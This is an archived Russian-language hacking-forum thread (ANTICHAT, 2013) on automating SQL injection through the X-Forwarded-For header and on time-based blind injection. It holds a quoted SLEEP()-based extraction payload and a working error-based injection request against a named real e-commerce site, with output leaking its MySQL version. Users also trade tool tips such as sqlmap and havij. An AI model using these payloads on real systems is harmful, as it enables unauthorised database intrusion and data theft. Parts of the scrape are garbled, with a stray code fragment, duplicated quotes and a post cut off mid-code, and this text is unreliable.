ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.01.2013, 21:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Как можно автоматизировать sqli через X-Forwarded-For: ?
|
|
|
|
06.01.2013, 02:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/
буду рад любой помощи
вроде понял
Сообщение от https://rdot.org/forum/showthread.php?t=124
https://rdot.org/forum/showthread.php?t=124 said:
3.4 Посимвольный перебор с помощью SLEEP Чтож про бенчмарк мы прочитали. И все обратили внимание на жуткую не стабильность этого метода. Что делать спросите вы? Вот что. С 5 ветки MySQL появился оператор SLEEP(). По сути эта функция и создает нужную нам задержку в ответе веб сервера, и, заметьте, без ненужных нагрузок на него. То есть SLEEP() является лучшей альтернативой BENCHMARK() и юзать желательно ее, но повторюсь единственный минус - эта функция появилась только аж в 5-ой ветке. Сказка, да и только. Как юзать? Все элементрано: http://xxx/news.php?id=-1' OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- Я юзаю значение в две - три секнуды, но вам советую подобрать его в соответствии с каналом сервера, так как могут возникнуть погрешности в выводе.
|
|
|
06.01.2013, 02:42
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от Vip77
Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?
Какой-нибудь плагин вроде tamper data.
|
|
|
|
06.01.2013, 06:28
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
|
|
|
|
06.01.2013, 07:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от wkar
wkar said:
Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
чем вас не устраивает sqlmap?!
|
|
|
|
06.01.2013, 14:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от Faaax
Faaax said:
чем вас не устраивает sqlmap?!
слишком крутая прога для меня
по сути я не знаю как засунуть в нее скуль такого типа:
.ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)
|
|
|
|
06.01.2013, 19:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Может знает кто как раскрутить
Код:
Code:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "
|
|
|
|
06.01.2013, 19:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Vip77
Vip77 said:
Может знает кто как раскрутить
Код:
Code:
GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gaming[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]accessories[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]razer[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rechargeble[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]lithium[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ion[/COLOR][COLOR="#007700"]-for-[/COLOR][COLOR="#0000BB"]mamba[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]elit[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]naga[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]epic[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]star[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]wars[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]000010[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www.3ona51[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
X[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Forwarded[/COLOR][COLOR="#007700"]-For:[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#DD0000"]", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#[/COLOR][/COLOR]
MySQL[1062]: Duplicate entry ' 5.5.13' for key 'group_key'
|
|
|
|
06.01.2013, 20:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от cat1vo
cat1vo said:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]gaming[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]accessories[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]razer[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]rechargeble[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]lithium[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ion[/COLOR][COLOR="#007700"]-for-[/COLOR][COLOR="#0000BB"]mamba[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]elit[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]naga[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]epic[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]star[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]wars[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]000010[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www.3ona51[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
X[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Forwarded[/COLOR][COLOR="#007700"]-For:[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#DD0000"]", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#[/COLOR][/COLOR]
MySQL[1062]: Duplicate entry '
5.5.13
' for key 'group_key' как првильно вставить в скрипт данные, чтобы получить такой результат?
IP: ' . $_SERVER[REMOTE_ADDR].
'
User-Agent: ' . $_SERVER['HTTP_USER_AGENT'].
'
X-Forwarded-For: ' . $_SERVER['HTTP_X_FORWARDED_FOR'].
'
X-Forwarded: ' . $_SERVER['HTTP_X_FORWARDED'].
'
Forwarded-for: ' . $_SERVER['HTTP_FORWARDED_FOR'].
'
Forwarded: ' . $_SERVER['HTTP_FORWARDED'].
'
Via: ' . $_SERVER['HTTP_VIA'].
'';
echo "All headers";
echo "";
print_r($_SERVER);
echo "";
?>
|
|
|
|
07.01.2013, 00:34
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от Vip77
Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?
Сообщение от herfleisch
herfleisch said:
Какой-нибудь плагин вроде tamper data.
" if author else f"
Vip77 said:
Как можно автоматизировать sqli через X-Forwarded-For: ?
Сообщение от herfleisch
herfleisch said:
Какой-нибудь плагин вроде tamper data.
Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
__________________
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
